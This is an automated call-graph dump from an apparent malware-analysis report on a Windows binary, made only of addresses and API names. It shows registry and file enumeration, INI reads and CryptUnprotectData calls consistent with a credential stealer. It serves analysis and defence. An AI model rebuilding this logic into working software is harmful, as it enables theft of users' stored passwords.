LocalAlloc 11939->11959 11941 401d09 11942 401d17 SHGetFolderPathA 11941->11942 11943 401d15 11941->11943 11942->11943 11944 401d68 11942->11944 11945 4018a0 LocalFree 11943->11945 11944->11933 11948 401c93 11944->11948 11946 401d35 11945->11946 11946->11944 11947 401bb8 6 API calls 11946->11947 11947->11946 11949 401c9d lstrlenA lstrlenA 11948->11949 11960 4018b7 LocalAlloc 11949->11960 11952 401ccc lstrcpyA lstrcatA 11953 401cf1 11952->11953 11954 401ce9 11952->11954 11956 404192 11953->11956 11955 4018a0 LocalFree 11954->11955 11955->11953 11961 403fe7 11956->11961 11959->11941 11960->11952 11962 404006 11961->11962 11964 404001 11961->11964 11963 4018a0 LocalFree 11962->11963 11965 40418e 11963->11965 11964->11962 11966 404026 11964->11966 11967 404017 11964->11967 11965->11938 11969 401c3f 5 API calls 11966->11969 11989 401c3f 11967->11989 11970 404024 11969->11970 11971 40404a FindFirstFileA 11970->11971 11971->11962 11990 401c49 lstrlenA lstrlenA 11989->11990 12106 4018b7 LocalAlloc 11990->12106 12156 404309 12155->12156 12157 4042cb GetProcAddress 12155->12157 12156->10910 12157->12156 12158 4042da GetProcAddress 12157->12158 12158->12156 12159 4042eb GetCurrentProcess 12158->12159 12160 4042f9 12159->12160 12160->10910 12160->12156 12161->10912 12163 401595 12162->12163 12163->10914 12165 404322 12164->12165 12166 404334 12164->12166 12165->12166 12167 40433b AllocateAndInitializeSid 12165->12167 12166->10917 12168 40437c 12167->12168 12169 40437e CheckTokenMembership 12167->12169 12168->10917 12170 404398 12169->12170 12171 40439f FreeSid 12169->12171 12170->12171 12171->10917 12173 40263e 18 API calls 12172->12173 12174 4043c1 12173->12174 12175 4043cc CoCreateGuid 12174->12175 12176 404437 12174->12176 12175->12176 12177 4043d9 wsprintfA lstrlenA 12175->12177 12179 4018a0 LocalFree 12176->12179 12233 40ae39 12232->12233 12240 40ad25 12232->12240 12233->10934 12234 40ad2c RegEnumKeyExA 12235 40ad55 RegCloseKey 12234->12235 12234->12240 12235->12233 12237 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 12237->12240 12238 401bb8 6 API calls 12238->12240 12239 4018a0 LocalFree 12239->12240 12240->12234 12240->12237 12240->12238 12240->12239 12241 40ad02 21 API calls 12240->12241 12243 40aa69 12240->12243 12241->12240 12306 4018b7 LocalAlloc 12243->12306 12245 40aa79 12307 4018b7 LocalAlloc 12245->12307 12247 40aa86 12308 4018b7 LocalAlloc 12247->12308 12249 40aa93 12309 4018b7 LocalAlloc 12249->12309 12251 40aaa0 12310 4018b7 LocalAlloc 12251->12310 12253 40aaad 12311 4018b7 LocalAlloc 12253->12311 12255 40aaba 12312 4018b7 LocalAlloc 12255->12312 12257 40aac7 7 API calls 12258 401bb8 6 API calls 12257->12258 12259 40ab62 12258->12259 12306->12245 12307->12247 12308->12249 12309->12251 12310->12253 12311->12255 12312->12257 12324 4015e3 12323->12324 12324->10937 12326 409ae2 12325->12326 12327 409a8b 12325->12327 12356 4018b7 LocalAlloc 12326->12356 12328 401bb8 6 API calls 12327->12328 12330 409a9d 12328->12330 12330->12326 12357 402272 12330->12357 12331 409aec RegOpenKeyA 12332 409b72 12331->12332 12351 409b02 12331->12351 12334 4018a0 LocalFree 12332->12334 12337 409b7a 12334->12337 12335 409b09 RegEnumKeyExA 12338 409b2e RegCloseKey 12335->12338 12335->12351 12337->10940 12338->12332 12339 401c3f 5 API calls 12339->12351 12340 409add 12342 4018a0 LocalFree 12340->12342 12342->12326 12343 401cf8 7 API calls 12345 409ab6 12343->12345 12344 401c93 6 API calls 12344->12351 12346 409ad5 12345->12346 12347 401c93 6 API calls 12345->12347 12349 4018a0 LocalFree 12346->12349 12350 409ac3 12347->12350 12348 409a76 79 API calls 12348->12351 12349->12340 12367 4098fb 12350->12367 12351->12335 12351->12339 12351->12344 12351->12348 12353 4018a0 LocalFree 12351->12353 12353->12351 12356->12331 12358 401c3f 5 API calls 12357->12358 12359 402281 lstrlenA 12358->12359 12360 40229f StrStrIA 12359->12360 12361 402290 12359->12361 12362 4022b2 StrRChrIA 12360->12362 12363 4022ae 12360->12363 12361->12360 12364 4022c0 lstrlenA 12362->12364 12363->12362 12366 4022d3 12364->12366 12366->12340 12366->12343 12406 401dc5 12367->12406 12550 401cf8 7 API calls 12549->12550 12552 407878 12550->12552 12551 4078b5 12551->10950 12552->12551 12553 401c93 6 API calls 12552->12553 12554 407887 12553->12554 12555 404192 41 API calls 12554->12555 12556 40789c 12555->12556 12557 404192 41 API calls 12556->12557 12558 4078b0 12557->12558 12559 4018a0 LocalFree 12558->12559 12559->12551 12561 407869 12560->12561 12568 407722 12560->12568 12561->10961 12562 407729 RegEnumKeyExA 12563 407752 RegCloseKey 12562->12563 12562->12568 12563->12561 12565 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 12565->12568 12566 4018a0 LocalFree 12566->12568 12567 401bb8 6 API calls 12567->12568 12568->12562 12568->12565 12568->12566 12568->12567 12569 404192 41 API calls 12568->12569 12570 407702 45 API calls 12568->12570 12569->12568 12570->12568 12572 401bb8 6 API calls 12571->12572 12573 40531f 12572->12573 12574 40537f 12573->12574 12575 401c3f 5 API calls 12573->12575 12574->11003 12576 405333 12575->12576 12599 4052e6 12576->12599 12579 401c3f 5 API calls 12580 40534e 12579->12580 12581 4052e6 16 API calls 12580->12581 12582 40535c 12581->12582 12583 401c3f 5 API calls 12582->12583 12584 405369 12583->12584 12585 4052e6 16 API calls 12584->12585 12586 405377 12585->12586 12587 4018a0 LocalFree 12586->12587 12587->12574 12600 405305 12599->12600 12601 4052ef 12599->12601 12600->12579 12602 403ead 16 API calls 12601->12602 12603 4052fd 12602->12603 12604 4018a0 LocalFree 12603->12604 12604->12600 12631 40bf32 12618->12631 12621 40bf32 46 API calls 12622 40bf99 12621->12622 12623 40bf32 46 API calls 12622->12623 12624 40bfb0 12623->12624 12625 40bf32 46 API calls 12624->12625 12626 40bfc7 12625->12626 12627 40bf32 46 API calls 12626->12627 12628 40bfde 12627->12628 12629 40bf32 46 API calls 12628->12629 12630 40bff5 12629->12630 12630->11046 12632 401cf8 7 API calls 12631->12632 12633 40bf3d 12632->12633 12634 40bf64 12633->12634 12635 401c93 6 API calls 12633->12635 12634->12621 12636 40bf4a 12635->12636 12637 403fe7 41 API calls 12636->12637 12638 40bf5f 12637->12638 12639 4018a0 LocalFree 12638->12639 12639->12634 12641 40649b 12640->12641 12650 406261 12640->12650 12641->11074 12642 406268 RegEnumKeyExA 12643 406291 RegCloseKey 12642->12643 12642->12650 12643->12641 12645 401c3f 5 API calls 12645->12650 12646 401c93 6 API calls 12646->12650 12647 4018a0 LocalFree 12647->12650 12648 401bb8 6 API calls 12648->12650 12649 4015b3 lstrlenA 12649->12650 12650->12642 12650->12645 12650->12646 12650->12647 12650->12648 12650->12649 12652 406b19 12651->12652 12658 406978 12651->12658 12652->11078 12653 40697f RegEnumKeyExA 12654 4069a8 RegCloseKey 12653->12654 12653->12658 12654->12652 12656 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 12656->12658 12657 401bb8 6 API calls 12657->12658 12658->12653 12658->12656 12658->12657 12659 4018a0 LocalFree 12658->12659 12660 4015b3 lstrlenA 12658->12660 12659->12658 12660->12658 12662 401cf8 7 API calls 12661->12662 12663 40c4b5 12662->12663 12664 40c4e2 12663->12664 12665 401c93 6 API calls 12663->12665 12666 401cf8 7 API calls 12664->12666 12667 40c4c4 12665->12667 12668 40c4ea 12666->12668 12669 403fe7 41 API calls 12667->12669 12670 40c517 12668->12670 12672 401c93 6 API calls 12668->12672 12671 40c4dd 12669->12671 12670->11095 12674 4018a0 LocalFree 12671->12674 12673 40c4f9 12672->12673 12675 403fe7 41 API calls 12673->12675 12674->12664 12676 40c512 12675->12676 12677 4018a0 LocalFree 12676->12677 12677->12670 12679 407194 12678->12679 12685 406fd6 12678->12685 12679->11111 12680 406fdd RegEnumKeyExA 12681 407006 RegCloseKey 12680->12681 12680->12685 12681->12679 12683 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 12683->12685 12684 401bb8 6 API calls 12684->12685 12685->12680 12685->12683 12685->12684 12686 406fb6 11 API calls 12685->12686 12687 4015b3 lstrlenA 12685->12687 12688 4018a0 LocalFree 12685->12688 12686->12685 12687->12685 12688->12685 12690 401cf8 7 API calls 12689->12690 12691 40c568 12690->12691 12692 40c590 12691->12692 12693 401c93 6 API calls 12691->12693 12692->11121 12694 40c577 12693->12694 12695 404192 41 API calls 12694->12695 12696 40c58b 12695->12696 12697 4018a0 LocalFree 12696->12697 12697->12692 12698->11128 12700 404a8e 12699->12700 12702 40496c 12699->12702 12700->11134 12701 404985 12704 401bb8 6 API calls 12701->12704 12702->12701 12703 401c93 6 API calls 12702->12703 12703->12701 12705 40499f 12704->12705 12706 4049c1 12705->12706 12708 401c3f 5 API calls 12705->12708 12707 401bb8 6 API calls 12706->12707 12709 4049d7 12707->12709 12710 4049ad 12708->12710 12711 4049f9 12709->12711 12713 401c3f 5 API calls 12709->12713 12712 404948 16 API calls 12710->12712 12714 401bb8 6 API calls 12711->12714 12715 4049b7 12712->12715 12718 4049e5 12713->12718 12716 404a10 12714->12716 12717 4018a0 LocalFree 12715->12717 12719 404a32 12716->12719 12722 401c3f 5 API calls 12716->12722 12720 4049bc 12717->12720 12721 404948 16 API calls 12718->12721 12724 401bb8 6 API calls 12719->12724 12723 4018a0 LocalFree 12720->12723 12725 4049ef 12721->12725 12726 404a1e 12722->12726 12723->12706 12727 404a48 12724->12727 12728 4018a0 LocalFree 12725->12728 12729 404948 16 API calls 12726->12729 12730 404a6a 12727->12730 12734 401c3f 5 API calls 12727->12734 12731 4049f4 12728->12731 12732 404a28 12729->12732 12735 4018a0 LocalFree 12731->12735 12735->12711 12755 401cf8 7 API calls 12754->12755 12756 407538 12755->12756 12757 40758a 12756->12757 12758 401c93 6 API calls 12756->12758 12757->11207 12759 407547 12758->12759 12760 404192 41 API calls 12759->12760 12761 40755d 12760->12761 12762 404192 41 API calls 12761->12762 12763 407571 12762->12763 12764 404192 41 API calls 12763->12764 12765 407585 12764->12765 12766 4018a0 LocalFree 12765->12766 12766->12757 12768 401cf8 7 API calls 12767->12768 12769 4075de 12768->12769 12770 407689 12769->12770 12771 4075fa 12769->12771 12772 401c93 6 API calls 12769->12772 12770->11225 12773 401c3f 5 API calls 12771->12773 12772->12771 12774 40760a 12773->12774 12775 403ead 16 API calls 12774->12775 12776 407619 12775->12776 12777 4018a0 LocalFree 12776->12777 12778 40761e 12777->12778 12779 401c3f 5 API calls 12778->12779 12780 40762b 12779->12780 12781 403ead 16 API calls 12780->12781 12782 40763a 12781->12782 12783 4018a0 LocalFree 12782->12783 12784 40763f 12783->12784 12785 401c3f 5 API calls 12784->12785 12786 40764c 12785->12786 12787 403ead 16 API calls 12786->12787 12799 406209 12798->12799 12808 406048 12798->12808 12799->11238 12800 40604f RegEnumKeyExA 12801 406078 RegCloseKey 12800->12801 12800->12808 12801->12799 12803 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 12803->12808 12804 401bb8 6 API calls 12804->12808 12805 4018a0 LocalFree 12805->12808 12806 4015b3 lstrlenA 12806->12808 12807 406025 11 API calls 12807->12808 12808->12800 12808->12803 12808->12804 12808->12805 12808->12806 12808->12807 12854 405685 12809->12854 12855 401bb8 6 API calls 12854->12855 12856 40569e 12855->12856 12857 401bb8 6 API calls 12856->12857 12858 4056b4 12857->12858 12859 401bb8 6 API calls 12858->12859 12860 4056ca 12859->12860 12861 401bb8 6 API calls 12860->12861 12862 4056e2 12861->12862 12863 401bb8 6 API calls 12862->12863 12864 4056f8 12863->12864 12865 401bb8 6 API calls 12864->12865 12869 405710 12865->12869 12866 4018a0 LocalFree 12867 4057b9 12866->12867 12868 4018a0 LocalFree 12867->12868 12870 4057c1 12868->12870 12871 4015b3 lstrlenA 12869->12871 12888 40578c 12869->12888 12873 405747 12871->12873 12875 4015b3 lstrlenA 12873->12875 12877 405752 12875->12877 12880 4015b3 lstrlenA 12877->12880 12888->12866 12890 404cd3 12889->12890 12892 404cce 12889->12892 12891 4018a0 LocalFree 12890->12891 12893 404e3c 12891->12893 12892->12890 12894 404cf3 12892->12894 12895 404ce4 12892->12895 12893->11298 12897 401c3f 5 API calls 12894->12897 12896 401c3f 5 API calls 12895->12896 12898 404cf1 12896->12898 12897->12898 12899 404d17 FindFirstFileA 12898->12899 12899->12890 12909 404d36 12899->12909 12900 404d44 lstrcmpiA 12902 404d56 12900->12902 12903 404d5b lstrcmpiA 12900->12903 12901 404da9 StrStrIA 12904 404e0c FindNextFileA 12901->12904 12901->12909 12902->12904 12907 401c3f 5 API calls 12902->12907 12910 401c93 6 API calls 12902->12910 12912 404cb4 24 API calls 12902->12912 12916 4018a0 LocalFree 12902->12916 12903->12902 12905 404e26 FindClose 12904->12905 12904->12909 12905->12890 12906 401c3f 5 API calls 12906->12909 12907->12902 12908 401c93 6 API calls 12908->12909 12909->12900 12909->12901 12909->12906 12909->12908 12911 404de7 StrStrIA 12909->12911 12913 404dfe 12909->12913 12910->12902 12911->12909 12912->12902 12915 4018a0 LocalFree 12913->12915 12928 404c9d 12913->12928 12915->12904 12916->12902 12918 401cf8 7 API calls 12917->12918 12919 404e55 12918->12919 12920 404e70 12919->12920 12922 401c3f 5 API calls 12919->12922 12921 404cb4 31 API calls 12920->12921 12923 404e80 12921->12923 12924 404e67 12922->12924 12925 4018a0 LocalFree 12923->12925 12926 4018a0 LocalFree 12924->12926 12927 404e88 12925->12927 12926->12920 12927->11293 12929 403ead 16 API calls 12928->12929 12930 404cb0 12929->12930 12930->12913 12932 405f88 12931->12932 12938 405db0 12931->12938 12932->11310 12933 405db7 RegEnumKeyExA 12934 405de0 RegCloseKey 12933->12934 12933->12938 12934->12932 12936 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 12936->12938 12937 401bb8 6 API calls 12937->12938 12938->12933 12938->12936 12938->12937 12939 4018a0 LocalFree 12938->12939 12940 4015b3 lstrlenA 12938->12940 12939->12938 12940->12938 12942 401cf8 7 API calls 12941->12942 12943 405ae9 12942->12943 12944 405b07 12943->12944 12945 401c93 6 API calls 12943->12945 12951 404192 41 API calls 12950->12951 12952 405ac5 12951->12952 12953 404192 41 API calls 12952->12953 12954 405ada 12953->12954 12954->11339 12956 401cf8 7 API calls 12955->12956 12958 405c34 12956->12958 12957 405c86 12957->11359 12958->12957 12959 401c93 6 API calls 12958->12959 12960 405c43 12959->12960 12961 404192 41 API calls 12960->12961 12962 405c59 12961->12962 12963 404192 41 API calls 12962->12963 12964 405c6d 12963->12964 12965 404192 41 API calls 12964->12965 12966 405c81 12965->12966 12967 4018a0 LocalFree 12966->12967 12967->12957 12969 408c43 12968->12969 12978 408b78 12968->12978 12969->11369 12970 408b7f RegEnumKeyExA 12971 408ba8 RegCloseKey 12970->12971 12970->12978 12971->12969 12973 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 12973->12978 12974 4018a0 LocalFree 12974->12978 12975 401bb8 6 API calls 12975->12978 12977 408b58 11 API calls 12977->12978 12978->12970 12978->12973 12978->12974 12978->12975 12978->12977 12994 403e84 12978->12994 12980 408d85 12979->12980 12989 408c67 12979->12989 12980->11373 12981 408c6e RegEnumKeyExA 12982 408c97 RegCloseKey 12981->12982 12981->12989 12982->12980 12984 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 12984->12989 12985 4018a0 LocalFree 12985->12989 12986 401bb8 6 API calls 12986->12989 12987 402272 9 API calls 12987->12989 12988 401dc5 GetFileAttributesA 12991 408ceb 12988->12991 12989->12981 12989->12984 12989->12985 12989->12986 12989->12987 12990 408c47 50 API calls 12989->12990 12989->12991 12990->12989 12991->12988 12992 404192 41 API calls 12991->12992 12993 4018a0 LocalFree 12991->12993 12992->12991 12993->12989 12995 403ea9 12994->12995 12996 403e8d 12994->12996 12995->12978 12996->12995 12997 4015b3 lstrlenA 12996->12997 12997->12995 12999 40da05 12998->12999 13004 40d845 12998->13004 12999->11379 13000 40d84c RegEnumKeyExA 13001 40d875 RegCloseKey 13000->13001 13000->13004 13001->12999 13003 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 13003->13004 13004->13000 13004->13003 13005 401bb8 6 API calls 13004->13005 13006 40d825 11 API calls 13004->13006 13007 4018a0 LocalFree 13004->13007 13008 4015b3 lstrlenA 13004->13008 13005->13004 13006->13004 13007->13004 13008->13004 13010 40d0f2 13009->13010 13019 40cebd 13009->13019 13010->11385 13011 40cec4 RegEnumKeyExA 13012 40ceed RegCloseKey 13011->13012 13011->13019 13012->13010 13014 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 13014->13019 13015 401bb8 6 API calls 13015->13019 13017 4018a0 LocalFree 13017->13019 13018 40ce9d 13 API calls 13018->13019 13019->13011 13019->13014 13019->13015 13019->13017 13019->13018 13020 4015b3 lstrlenA 13019->13020 13031 40421d 13019->13031 13020->13019 13022 401bb8 6 API calls 13021->13022 13026 40d112 13022->13026 13023 40d181 13023->11389 13024 40d17c 13025 4018a0 LocalFree 13024->13025 13025->13023 13026->13023 13026->13024 13027 40d134 wsprintfA 13026->13027 13029 403ead 16 API calls 13026->13029 13030 4018a0 LocalFree 13026->13030 13028 401bb8 6 API calls 13027->13028 13028->13026 13029->13026 13030->13026 13032 4042a2 13031->13032 13033 404246 13031->13033 13032->13019 13033->13032 13034 404263 CryptUnprotectData 13033->13034 13034->13032 13036 404273 13034->13036 13035 40429a LocalFree 13035->13032 13036->13032 13036->13035 13038 401cf8 7 API calls 13037->13038 13039 405169 13038->13039 13040 405200 13039->13040 13041 401c3f 5 API calls 13039->13041 13040->11436 13042 405181 13041->13042 13043 405024 29 API calls 13042->13043 13044 405190 13043->13044 13045 4018a0 LocalFree 13044->13045 13046 405195 13045->13046 13047 401c3f 5 API calls 13046->13047 13048 4051a2 13047->13048 13049 405024 29 API calls 13048->13049 13050 4051b1 13049->13050 13051 4018a0 LocalFree 13050->13051 13052 4051b6 13051->13052 13053 401c3f 5 API calls 13052->13053 13054 4051c3 13053->13054 13055 405024 29 API calls 13054->13055 13067 401bb8 6 API calls 13066->13067 13069 404ffe 13067->13069 13068 405020 13068->11446 13069->13068 13070 4018a0 LocalFree 13069->13070 13070->13068 13072 405043 13071->13072 13073 40503e 13071->13073 13075 4018a0 LocalFree 13072->13075 13073->13072 13074 401c3f 5 API calls 13073->13074 13076 405053 13074->13076 13077 405157 13075->13077 13095 404fc3 13076->13095 13077->11433 13080 4018a0 LocalFree 13081 405062 13080->13081 13082 401c3f 5 API calls 13081->13082 13083 40506f 13082->13083 13084 405086 FindFirstFileA 13083->13084 13084->13072 13085 4050a5 13084->13085 13086 4050b3 lstrcmpiA 13085->13086 13087 405127 FindNextFileA 13085->13087 13089 4050cd lstrcmpiA 13086->13089 13093 4050cb 13086->13093 13087->13085 13088 405141 FindClose 13087->13088 13088->13072 13089->13093 13090 401c3f 5 API calls 13090->13093 13091 401c93 6 API calls 13091->13093 13092 404fc3 16 API calls 13092->13093 13093->13087 13093->13090 13093->13091 13093->13092 13094 4018a0 LocalFree 13093->13094 13094->13087 13096 403ead 16 API calls 13095->13096 13097 404fd6 13096->13097 13097->13080 13099 401cf8 7 API calls 13098->13099 13100 408a66 13099->13100 13101 408a79 13100->13101 13128 40891f 13100->13128 13101->11468 13104 4018a0 LocalFree 13104->13101 13106 4087ba 13105->13106 13109 4087b5 13105->13109 13107 4018a0 LocalFree 13106->13107 13108 40891b 13107->13108 13108->11482 13109->13106 13110 4087da 13109->13110 13111 4087cb 13109->13111 13113 401c3f 5 API calls 13110->13113 13112 401c3f 5 API calls 13111->13112 13114 4087d8 13112->13114 13113->13114 13115 4087fe FindFirstFileA 13114->13115 13115->13106 13127 40881d 13115->13127 13116 4088a8 StrStrIA 13119 4088eb FindNextFileA 13116->13119 13116->13127 13117 40882b lstrcmpiA 13117->13127 13119->13127 13121 401c93 6 API calls 13121->13127 13122 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 13122->13127 13124 4018a0 LocalFree 13124->13119 13125 40879b 32 API calls 13125->13127 13126 4018a0 LocalFree 13126->13127 13127->13116 13127->13117 13127->13119 13127->13121 13127->13122 13127->13124 13127->13125 13127->13126 13148 408756 13127->13148 13129 408939 13128->13129 13130 40893e 13128->13130 13129->13130 13131 401c3f 5 API calls 13129->13131 13132 4018a0 LocalFree 13130->13132 13134 408950 13131->13134 13133 408a57 13132->13133 13133->13104 13135 408967 FindFirstFileA 13134->13135 13135->13130 13140 408986 13135->13140 13136 408a27 FindNextFileA 13139 408a41 FindClose 13136->13139 13136->13140 13137 408998 lstrcmpiA 13138 4089b2 lstrcmpiA 13137->13138 13137->13140 13138->13140 13139->13130 13140->13136 13140->13137 13141 401c3f 5 API calls 13140->13141 13142 401c93 6 API calls 13140->13142 13141->13140 13143 4089f4 StrStrIA 13142->13143 13144 408a22 13143->13144 13145 408a0f 13143->13145 13147 4018a0 LocalFree 13144->13147 13146 40879b 38 API calls 13145->13146 13146->13144 13147->13136 13239 401bb8 6 API calls 13238->13239 13240 40e6a3 13239->13240 13241 40e6c2 13240->13241 13245 40e63c 13240->13245 13241->11500 13244 4018a0 LocalFree 13244->13241 13252 40e606 13245->13252 13248 40e606 46 API calls 13249 40e66d 13248->13249 13250 40e606 46 API calls 13249->13250 13251 40e684 13250->13251 13251->13244 13253 401cf8 7 API calls 13252->13253 13254 40e611 13253->13254 13255 40e638 13254->13255 13256 401c93 6 API calls 13254->13256 13255->13248 13257 40e61e 13256->13257 13258 403fe7 41 API calls 13257->13258 13259 40e633 13258->13259 13260 4018a0 LocalFree 13259->13260 13260->13255 13262 40e3a0 13261->13262 13263 40e3a4 13261->13263 13262->11518 13272 4018b7 LocalAlloc 13263->13272 13265 40e3ae lstrlenA 13267 40e3d8 13265->13267 13268 40e3ed 13265->13268 13269 404192 41 API calls 13267->13269 13270 4018a0 LocalFree 13268->13270 13269->13268 13271 40e3f5 13270->13271 13271->11518 13272->13265 13274 40e1a7 13273->13274 13275 40e07f 13273->13275 13274->11531 13276 401bb8 6 API calls 13275->13276 13277 40e091 13276->13277 13278 401bb8 6 API calls 13277->13278 13279 40e0a6 13278->13279 13280 401bb8 6 API calls 13279->13280 13281 40e0bd 13280->13281 13282 401bb8 6 API calls 13281->13282 13283 40e0d2 13282->13283 13284 401bb8 6 API calls 13283->13284 13289 40e0e7 13284->13289 13285 40e177 13286 4018a0 LocalFree 13285->13286 13287 40e17f 13286->13287 13288 4018a0 LocalFree 13287->13288 13290 40e187 13288->13290 13289->13285 13292 40421d 2 API calls 13289->13292 13291 4018a0 LocalFree 13290->13291 13293 40e18f 13291->13293 13297 40e11a 13292->13297 13297->13285 13299 4015b3 lstrlenA 13297->13299 13300 40e148 13299->13300 13301 4015b3 lstrlenA 13300->13301 13302 40e153 13301->13302 13303 4015b3 lstrlenA 13302->13303 13307 40e270 13306->13307 13311 40e1cb 13306->13311 13307->11535 13308 40e1d2 RegEnumValueA 13309 40e200 RegCloseKey 13308->13309 13308->13311 13309->13307 13311->13308 13312 401bb8 6 API calls 13311->13312 13313 40e22d StrStrIA 13311->13313 13315 4018a0 LocalFree 13311->13315 13316 40df29 13311->13316 13312->13311 13313->13311 13315->13311 13317 401d7d 2 API calls 13316->13317 13318 40df38 13317->13318 13319 40df3c 13318->13319 13320 401e44 7 API calls 13318->13320 13319->13311 13321 40df4d 13320->13321 13322 40e05b 13321->13322 13336 4018b7 LocalAlloc 13321->13336 13322->13311 13324 40df76 StrStrA 13325 40df8a lstrlenA StrStrA 13324->13325 13328 40df85 13324->13328 13326 40dfaf lstrlenA 13325->13326 13325->13328 13327 40df5d 13326->13327 13327->13324 13327->13328 13333 4018a0 LocalFree 13327->13333 13334 40421d 2 API calls 13327->13334 13335 4015b3 lstrlenA 13327->13335 13337 402864 lstrlenA 13327->13337 13330 4018a0 LocalFree 13328->13330 13331 40e052 13330->13331 13332 401ed8 3 API calls 13331->13332 13332->13322 13333->13327 13334->13327 13335->13327 13336->13327 13340 4018b7 LocalAlloc 13337->13340 13339 402876 lstrcpyA 13339->13327 13340->13339 13358 4018b7 LocalAlloc 13341->13358 13343 40e837 RegOpenKeyA 13344 40e95f 13343->13344 13357 40e854 13343->13357 13345 4018a0 LocalFree 13344->13345 13348 40e96a 13345->13348 13346 40e85b RegEnumKeyExA 13347 40e884 RegCloseKey 13346->13347 13346->13357 13347->13344 13348->11541 13350 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 13350->13357 13351 401bb8 6 API calls 13351->13357 13352 40e824 45 API calls 13352->13357 13353 401c3f 5 API calls 13354 40e8e5 GetPrivateProfileStringA 13353->13354 13354->13357 13355 4018a0 LocalFree 13355->13357 13356 404192 41 API calls 13356->13357 13357->13346 13357->13350 13357->13351 13357->13352 13357->13353 13357->13355 13357->13356 13358->13343 13360 40f542 13359->13360 13361 40f528 13359->13361 13363 40f138 RegOpenKeyA 13360->13363 13361->13360 13383 40a298 13361->13383 13364 40f1d3 13363->13364 13369 40f154 13363->13369 13364->11551 13365 40f15b RegEnumKeyExA 13366 40f184 RegCloseKey 13365->13366 13365->13369 13366->13364 13368 401c3f 5 API calls 13368->13369 13369->13365 13369->13368 13370 401c93 6 API calls 13369->13370 13372 4018a0 LocalFree 13369->13372 13396 40efa3 13369->13396 13370->13369 13372->13369 13374 40f27d 13373->13374 13380 40f1f7 13373->13380 13374->11555 13375 40f1fe RegEnumKeyExA 13376 40f227 RegCloseKey 13375->13376 13375->13380 13376->13374 13378 401c3f 5 API calls 13378->13380 13379 401c93 6 API calls 13379->13380 13380->13375 13380->13378 13380->13379 13381 40f138 23 API calls 13380->13381 13382 4018a0 LocalFree 13380->13382 13381->13380 13382->13380 13385 40a2b8 13383->13385 13384 40a30d 13384->13360 13385->13384 13387 40a202 13385->13387 13388 40a225 13387->13388 13389 40a282 13388->13389 13391 40a17c 13388->13391 13389->13385 13392 40a189 13391->13392 13393 40a18e 13391->13393 13392->13388 13394 40a1f2 13393->13394 13395 40a1e1 CoTaskMemFree 13393->13395 13394->13388 13395->13393 13398 40efb3 13396->13398 13397 401bb8 6 API calls 13397->13398 13398->13397 13401 4018a0 LocalFree 13398->13401 13402 40efef 13398->13402 13415 40ef59 13398->13415 13400 401bb8 6 API calls 13400->13402 13401->13398 13402->13400 13403 40f046 13402->13403 13405 4015b3 lstrlenA 13402->13405 13406 4018a0 LocalFree 13402->13406 13404 401bb8 6 API calls 13403->13404 13407 4018a0 LocalFree 13403->13407 13409 40421d 2 API calls 13403->13409 13411 40ef59 6 API calls 13403->13411 13413 40f0c7 13403->13413 13404->13403 13405->13402 13406->13402 13407->13403 13408 401bb8 6 API calls 13408->13413 13409->13403 13410 40f11e 13410->13369 13411->13403 13412 4015b3 lstrlenA 13412->13413 13413->13408 13413->13410 13413->13412 13414 4018a0 LocalFree 13413->13414 13414->13413 13424 402902 13415->13424 13417 40ef9a 13417->13398 13418 40ef6a 13418->13417 13419 4015b3 lstrlenA 13418->13419 13420 40ef87 13419->13420 13421 4015b3 lstrlenA 13420->13421 13422 40ef92 13421->13422 13423 4018a0 LocalFree 13422->13423 13423->13417 13425 402911 13424->13425 13426 40290b 13424->13426 13425->13418 13426->13425 13427 402917 IsTextUnicode 13426->13427 13428 402938 13427->13428 13429 402928 13427->13429 13443 4018b7 LocalAlloc 13428->13443 13433 402885 13429->13433 13432 402936 13432->13418 13434 402892 13433->13434 13435 402899 WideCharToMultiByte 13433->13435 13434->13432 13436 4028b6 13435->13436 13437 4028e8 13435->13437 13444 4018b7 LocalAlloc 13436->13444 13437->13432 13439 4028c1 13439->13437 13440 4028c5 WideCharToMultiByte 13439->13440 13440->13437 13441 4028e2 13440->13441 13442 4018a0 LocalFree 13441->13442 13442->13437 13443->13432 13444->13439 13445->11581 13446->11590 13448 407f5a 13447->13448 13453 407d66 13447->13453 13448->11609 13449 407d6d RegEnumKeyExA 13450 407d96 RegCloseKey 13449->13450 13449->13453 13450->13448 13452 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 13452->13453 13453->13449 13453->13452 13454 401bb8 6 API calls 13453->13454 13455 407d46 11 API calls 13453->13455 13456 4015b3 lstrlenA 13453->13456 13457 4018a0 LocalFree 13453->13457 13454->13453 13455->13453 13456->13453 13457->13453 13459 407c56 13458->13459 13464 407a14 13458->13464 13459->11640 13460 407a1b RegEnumKeyExA 13461 407a44 RegCloseKey 13460->13461 13460->13464 13461->13459 13463 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 13463->13464 13464->13460 13464->13463 13465 401bb8 6 API calls 13464->13465 13466 4015b3 lstrlenA 13464->13466 13467 4018a0 LocalFree 13464->13467 13468 4079f4 11 API calls 13464->13468 13465->13464 13466->13464 13467->13464 13468->13464 13470 40ecd5 13469->13470 13476 40e9ee 13469->13476 13470->11646 13471 40e9f5 RegEnumKeyExA 13472 40ea1e RegCloseKey 13471->13472 13471->13476 13472->13470 13473 401c3f 5 API calls 13473->13476 13475 401c93 6 API calls 13475->13476 13476->13471 13476->13473 13476->13475 13477 401bb8 6 API calls 13476->13477 13478 40e9ce 15 API calls 13476->13478 13479 4015b3 lstrlenA 13476->13479 13480 4018a0 LocalFree 13476->13480 13477->13476 13478->13476 13479->13476 13480->13476 13482 401cf8 7 API calls 13481->13482 13483 408e18 13482->13483 13484 408e55 13483->13484 13485 401c93 6 API calls 13483->13485 13484->11652 13486 408e27 13485->13486 13487 404192 41 API calls 13486->13487 13488 408e3c 13487->13488 